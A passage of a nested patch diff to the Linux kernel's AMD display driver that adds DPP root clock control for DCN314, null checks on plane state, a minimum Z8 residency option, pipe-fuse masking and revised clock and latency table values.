++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -1375,6 +1375,7 @@ int pre_validate_dsc(struct drm_atomic_state *state,
+ 	ret = pre_compute_mst_dsc_configs_for_state(state, local_dc_state, vars);
+ 	if (ret != 0) {
+ 		DRM_INFO_ONCE("pre_compute_mst_dsc_configs_for_state() failed\n");
++		ret = -EINVAL;
+ 		goto clean_exit;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+index 200fcec191861..1859b2e4a98a1 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+@@ -719,6 +719,8 @@ void dcn32_clk_mgr_construct(
+ 		struct pp_smu_funcs *pp_smu,
+ 		struct dccg *dccg)
+ {
++	struct clk_log_info log_info = {0};
++
+ 	clk_mgr->base.ctx = ctx;
+ 	clk_mgr->base.funcs = &dcn32_funcs;
+ 	if (ASICREV_IS_GC_11_0_2(clk_mgr->base.ctx->asic_id.hw_internal_rev)) {
+@@ -752,6 +754,7 @@ void dcn32_clk_mgr_construct(
+ 			clk_mgr->base.clks.ref_dtbclk_khz = 268750;
+ 	}
+ 
++
+ 	/* integer part is now VCO frequency in kHz */
+ 	clk_mgr->base.dentist_vco_freq_khz = dcn32_get_vco_frequency_from_reg(clk_mgr);
+ 
+@@ -759,6 +762,8 @@ void dcn32_clk_mgr_construct(
+ 	if (clk_mgr->base.dentist_vco_freq_khz == 0)
+ 		clk_mgr->base.dentist_vco_freq_khz = 4300000; /* Updated as per HW docs */
+ 
++	dcn32_dump_clk_registers(&clk_mgr->base.boot_snapshot, &clk_mgr->base, &log_info);
++
+ 	if (ctx->dc->debug.disable_dtb_ref_clk_switch &&
+ 			clk_mgr->base.clks.ref_dtbclk_khz != clk_mgr->base.boot_snapshot.dtbclk) {
+ 		clk_mgr->base.clks.ref_dtbclk_khz = clk_mgr->base.boot_snapshot.dtbclk;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index da164685547d9..21e9c86665f18 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -1707,6 +1707,9 @@ bool dc_remove_plane_from_context(
+ 	struct dc_stream_status *stream_status = NULL;
+ 	struct resource_pool *pool = dc->res_pool;
+ 
++	if (!plane_state)
++		return true;
++
+ 	for (i = 0; i < context->stream_count; i++)
+ 		if (context->streams[i] == stream) {
+ 			stream_status = &context->stream_status[i];
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 37998dc0fc144..b519602c054b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -796,6 +796,7 @@ struct dc_debug_options {
+ 	unsigned int force_odm_combine; //bit vector based on otg inst
+ 	unsigned int seamless_boot_odm_combine;
+ 	unsigned int force_odm_combine_4to1; //bit vector based on otg inst
++	int minimum_z8_residency_time;
+ 	bool disable_z9_mpc;
+ 	unsigned int force_fclk_khz;
+ 	bool enable_tri_buf;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 8f894c1d1d1eb..7af210bbc592f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -728,11 +728,15 @@ void dcn10_hubp_pg_control(
+ 	}
+ }
+ 
+-static void power_on_plane(
++static void power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	int plane_id)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, plane_id, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1239,11 +1243,15 @@ void dcn10_plane_atomic_power_down(struct dc *dc,
+ 			hws->funcs.hubp_pg_control(hws, hubp->inst, false);
+ 
+ 		dpp->funcs->dpp_reset(dpp);
++
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 0);
+ 		DC_LOG_DEBUG(
+ 				"Power gated front end %d\n", hubp->inst);
+ 	}
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, dpp->inst, false);
+ }
+ 
+ /* disable HW used by plane.
+@@ -2464,7 +2472,7 @@ static void dcn10_enable_plane(
+ 
+ 	undo_DEGVIDCN10_253_wa(dc);
+ 
+-	power_on_plane(dc->hwseq,
++	power_on_plane_resources(dc->hwseq,
+ 		pipe_ctx->plane_res.hubp->inst);
+ 
+ 	/* enable DCFCLK current DCHUB */
+@@ -3383,7 +3391,9 @@ static bool dcn10_can_pipe_disable_cursor(struct pipe_ctx *pipe_ctx)
+ 	for (test_pipe = pipe_ctx->top_pipe; test_pipe;
+ 	     test_pipe = test_pipe->top_pipe) {
+ 		// Skip invisible layer and pipe-split plane on same layer
+-		if (!test_pipe->plane_state->visible || test_pipe->plane_state->layer_index == cur_layer)
++		if (!test_pipe->plane_state ||
++		    !test_pipe->plane_state->visible ||
++		    test_pipe->plane_state->layer_index == cur_layer)
+ 			continue;
+ 
+ 		r2 = test_pipe->plane_res.scl_data.recout;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 6291a241158ad..7e36ba4df89fd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1110,11 +1110,15 @@ void dcn20_blank_pixel_data(
+ }
+ 
+ 
+-static void dcn20_power_on_plane(
++static void dcn20_power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	struct pipe_ctx *pipe_ctx)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, pipe_ctx->plane_res.dpp->inst, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1138,7 +1142,7 @@ static void dcn20_enable_plane(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	//if (dc->debug.sanity_checks) {
+ 	//	dcn10_verify_allow_pstate_change_high(dc);
+ 	//}
+-	dcn20_power_on_plane(dc->hwseq, pipe_ctx);
++	dcn20_power_on_plane_resources(dc->hwseq, pipe_ctx);
+ 
+ 	/* enable DCFCLK current DCHUB */
+ 	pipe_ctx->plane_res.hubp->funcs->hubp_clk_cntl(pipe_ctx->plane_res.hubp, true);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index 7f34418e63081..7d2b982506fd7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -66,17 +66,8 @@ void dccg31_update_dpp_dto(struct dccg *dccg, int dpp_inst, int req_dppclk)
+ 		REG_UPDATE(DPPCLK_DTO_CTRL,
+ 				DPPCLK_DTO_ENABLE[dpp_inst], 1);
+ 	} else {
+-		//DTO must be enabled to generate a 0Hz clock output
+-		if (dccg->ctx->dc->debug.root_clock_optimization.bits.dpp) {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 1);
+-			REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
+-					DPPCLK0_DTO_PHASE, 0,
+-					DPPCLK0_DTO_MODULO, 1);
+-		} else {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 0);
+-		}
++		REG_UPDATE(DPPCLK_DTO_CTRL,
++				DPPCLK_DTO_ENABLE[dpp_inst], 0);
+ 	}
+ 	dccg->pipe_dppclk_khz[dpp_inst] = req_dppclk;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+index 0b769ee714058..081ce168f6211 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+@@ -289,8 +289,31 @@ static void dccg314_set_valid_pixel_rate(
+ 	dccg314_set_dtbclk_dto(dccg, &dto_params);
+ }
+ 
++static void dccg314_dpp_root_clock_control(
++		struct dccg *dccg,
++		unsigned int dpp_inst,
++		bool clock_on)
++{
++	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
++
++	if (clock_on) {
++		/* turn off the DTO and leave phase/modulo at max */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 0);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0xFF,
++			  DPPCLK0_DTO_MODULO, 0xFF);
++	} else {
++		/* turn on the DTO to generate a 0hz clock */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 1);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0,
++			  DPPCLK0_DTO_MODULO, 1);
++	}
++}
++
+ static const struct dccg_funcs dccg314_funcs = {
+ 	.update_dpp_dto = dccg31_update_dpp_dto,
++	.dpp_root_clock_control = dccg314_dpp_root_clock_control,
+ 	.get_dccg_ref_freq = dccg31_get_dccg_ref_freq,
+ 	.dccg_init = dccg31_init,
+ 	.set_dpstreamclk = dccg314_set_dpstreamclk,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index 8e824dc81dede..414d7358a075f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -392,6 +392,16 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 				pix_per_cycle);
+ }
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on)
++{
++	if (!hws->ctx->dc->debug.root_clock_optimization.bits.dpp)
++		return;
++
++	if (hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control)
++		hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control(
++			hws->ctx->dc->res_pool->dccg, dpp_inst, clock_on);
++}
++
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
+ {
+ 	struct dc_context *ctx = hws->ctx;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index c419d3dbdfee6..c786d5e6a428e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -43,4 +43,6 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 25f345ff6c8f0..93de284e54653 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,6 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
++	.dpp_root_clock_control = dcn314_dpp_root_clock_control,
+ 	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 9ffba4c6fe550..30129fb9c27a9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -887,6 +887,7 @@ static const struct dc_plane_cap plane_cap = {
+ static const struct dc_debug_options debug_defaults_drv = {
+ 	.disable_z10 = false,
+ 	.enable_z9_disable_interface = true,
++	.minimum_z8_residency_time = 2000,
+ 	.psr_skip_crtc_disable = true,
+ 	.disable_dmcu = true,
+ 	.force_abm_enable = false,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 30d15a94f720d..578a715040ac3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -992,6 +992,7 @@ void dcn32_init_hw(struct dc *dc)
+ 	if (dc->ctx->dmub_srv) {
+ 		dc_dmub_srv_query_caps_cmd(dc->ctx->dmub_srv->dmub);
+ 		dc->caps.dmub_caps.psr = dc->ctx->dmub_srv->dmub->feature_caps.psr;
++		dc->caps.dmub_caps.mclk_sw = dc->ctx->dmub_srv->dmub->feature_caps.fw_assisted_mclk_switch;
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 6187aba1362b8..a473f10b53276 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2021,7 +2021,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	// In general cases we want to keep the dram clock change requirement
+ 	// (prefer configs that support MCLK switch). Only override to false
+ 	// for SubVP
+-	if (subvp_in_use)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching || subvp_in_use)
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = false;
+ 	else
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = true;
+@@ -2077,6 +2077,14 @@ static struct resource_funcs dcn32_res_pool_funcs = {
+ 	.restore_mall_state = dcn32_restore_mall_state,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN32 support max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn32_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -2119,7 +2127,7 @@ static bool dcn32_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn32;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index 1709b6edb89c9..bb36da5cc6c55 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1626,6 +1626,14 @@ static struct resource_funcs dcn321_res_pool_funcs = {
+ 	.restore_mall_state = dcn32_restore_mall_state,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN321 support max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn321_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -1668,7 +1676,7 @@ static bool dcn321_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn321;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index c26da3bb2892b..b6b8be74ee0ea 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -949,7 +949,6 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	int plane_count;
+ 	int i;
+ 	unsigned int optimized_min_dst_y_next_start_us;
+-	bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > 1000.0;
+ 
+ 	plane_count = 0;
+ 	optimized_min_dst_y_next_start_us = 0;
+@@ -974,6 +973,9 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
++		int minmum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
++		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minmum_z8_residency;
++		bool is_pwrseq0 = link->link_index == 0;
+ 
+ 		if (dc_extended_blank_supported(dc)) {
+ 			for (i = 0; i < dc->res_pool->pipe_count; i++) {
+@@ -986,18 +988,17 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 				}
+ 			}
+ 		}
+-		/* zstate only supported on PWRSEQ0  and when there's <2 planes*/
+-		if (link->link_index != 0 || stream_status->plane_count > 1)
++
++		/* Don't support multi-plane configurations */
++		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000)
++		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000))
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+-		else if (link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
++		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+ 		else
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY : DCN_ZSTATE_SUPPORT_DISALLOW;
+-	} else if (allow_z8) {
+-		return DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY;
+ 	} else {
+ 		return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index 4fa6363647937..fdfb19337ea6e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -368,7 +368,9 @@ void dcn30_fpu_update_soc_for_wm_a(struct dc *dc, struct dc_state *context)
+ 	dc_assert_fp_enabled();
+ 
+ 	if (dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].valid) {
+-		context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
++		if (!context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching ||
++				context->bw_ctx.dml.soc.dram_clock_change_latency_us == 0)
++			context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
+ 		context->bw_ctx.dml.soc.sr_enter_plus_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_enter_plus_exit_time_us;
+ 		context->bw_ctx.dml.soc.sr_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_exit_time_us;
+ 	}
+@@ -520,6 +522,20 @@ void dcn30_fpu_calculate_wm_and_dlg(
+ 		pipe_idx++;
+ 	}
+ 
++	// WA: restrict FPO to use first non-strobe mode (NV24 BW issue)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching &&
++			dc->dml.soc.num_chans <= 4 &&
++			context->bw_ctx.dml.vba.DRAMSpeed <= 1700 &&
++			context->bw_ctx.dml.vba.DRAMSpeed >= 1500) {
++
++		for (i = 0; i < dc->dml.soc.num_states; i++) {
++			if (dc->dml.soc.clock_limits[i].dram_speed_mts > 1700) {
++				context->bw_ctx.dml.vba.DRAMSpeed = dc->dml.soc.clock_limits[i].dram_speed_mts;
++				break;
++			}
++		}
++	}
++
+ 	dcn20_calculate_dlg_params(dc, context, pipes, pipe_cnt, vlevel);
+ 
+ 	if (!pstate_en)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 6a1cf6adea77d..db06f3b9e637e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -149,8 +149,8 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_14_soc = {
+ 	.num_states = 5,
+ 	.sr_exit_time_us = 16.5,
+ 	.sr_enter_plus_exit_time_us = 18.5,
+-	.sr_exit_z8_time_us = 280.0,
+-	.sr_enter_plus_exit_z8_time_us = 350.0,
++	.sr_exit_z8_time_us = 268.0,
++	.sr_enter_plus_exit_z8_time_us = 393.0,
+ 	.writeback_latency_us = 12.0,
+ 	.dram_channel_width_bytes = 4,
+ 	.round_trip_ping_latency_dcfclk_cycles = 106,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 4b8f5fa0f0ad6..ec72b3c24b791 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -807,7 +807,8 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					v->SwathHeightY[k],
+ 					v->SwathHeightC[k],
+ 					TWait,
+-					v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ?
++					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
++						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+@@ -3289,7 +3290,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->swath_width_chroma_ub_this_state[k],
+ 							v->SwathHeightYThisState[k],
+ 							v->SwathHeightCThisState[k], v->TWait,
+-							v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ ?
++							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 
+ 							/* Output */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+index c8b28c83ddf48..e92eee2c664d0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+@@ -52,6 +52,7 @@
+ #define BPP_BLENDED_PIPE 0xffffffff
+ 
+ #define MEM_STROBE_FREQ_MHZ 1600
++#define MIN_DCFCLK_FREQ_MHZ 200
+ #define MEM_STROBE_MAX_DELIVERY_TIME_US 60.0
+ 
+ struct display_mode_lib;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index b80cef70fa60f..383a409a3f54c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -106,16 +106,16 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.clock_limits = {
+ 		{
+ 			.state = 0,
+-			.dcfclk_mhz = 1564.0,
+-			.fabricclk_mhz = 400.0,
+-			.dispclk_mhz = 2150.0,
+-			.dppclk_mhz = 2150.0,
++			.dcfclk_mhz = 1434.0,
++			.fabricclk_mhz = 2250.0,
++			.dispclk_mhz = 1720.0,
++			.dppclk_mhz = 1720.0,
+ 			.phyclk_mhz = 810.0,
+ 			.phyclk_d18_mhz = 667.0,
+-			.phyclk_d32_mhz = 625.0,
++			.phyclk_d32_mhz = 313.0,
+ 			.socclk_mhz = 1200.0,
+-			.dscclk_mhz = 716.667,
+-			.dram_speed_mts = 1600.0,
++			.dscclk_mhz = 573.333,
++			.dram_speed_mts = 16000.0,
+ 			.dtbclk_mhz = 1564.0,
+ 		},
+ 	},
+@@ -125,14 +125,14 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.sr_exit_z8_time_us = 285.0,
+ 	.sr_enter_plus_exit_z8_time_us = 320,
+ 	.writeback_latency_us = 12.0,
+-	.round_trip_ping_latency_dcfclk_cycles = 263,
++	.round_trip_ping_latency_dcfclk_cycles = 207,
+ 	.urgent_latency_pixel_data_only_us = 4,
+ 	.urgent_latency_pixel_mixed_with_vm_data_us = 4,
+ 	.urgent_latency_vm_data_only_us = 4,
+-	.fclk_change_latency_us = 20,
+-	.usr_retraining_latency_us = 2,
+-	.smn_latency_us = 2,
+-	.mall_allocated_for_dcn_mbytes = 64,
++	.fclk_change_latency_us = 7,
++	.usr_retraining_latency_us = 0,
++	.smn_latency_us = 0,
++	.mall_allocated_for_dcn_mbytes = 32,
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+index ce006762f2571..ad6acd1b34e1d 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+@@ -148,18 +148,21 @@ struct dccg_funcs {
+ 		struct dccg *dccg,
+ 		int inst);
+ 
+-void (*set_pixel_rate_div)(
+-        struct dccg *dccg,
+-        uint32_t otg_inst,
+-        enum pixel_rate_div k1,
+-        enum pixel_rate_div k2);
+-
+-void (*set_valid_pixel_rate)(
+-        struct dccg *dccg,
+-	int ref_dtbclk_khz,
+-        int otg_inst,
+-        int pixclk_khz);
++	void (*set_pixel_rate_div)(struct dccg *dccg,
++			uint32_t otg_inst,
++			enum pixel_rate_div k1,
++			enum pixel_rate_div k2);
+ 
++	void (*set_valid_pixel_rate)(
++			struct dccg *dccg,
++			int ref_dtbclk_khz,
++			int otg_inst,
++			int pixclk_khz);
++
++	void (*dpp_root_clock_control)(
++			struct dccg *dccg,
++			unsigned int dpp_inst,
++			bool clock_on);
+ };
+ 
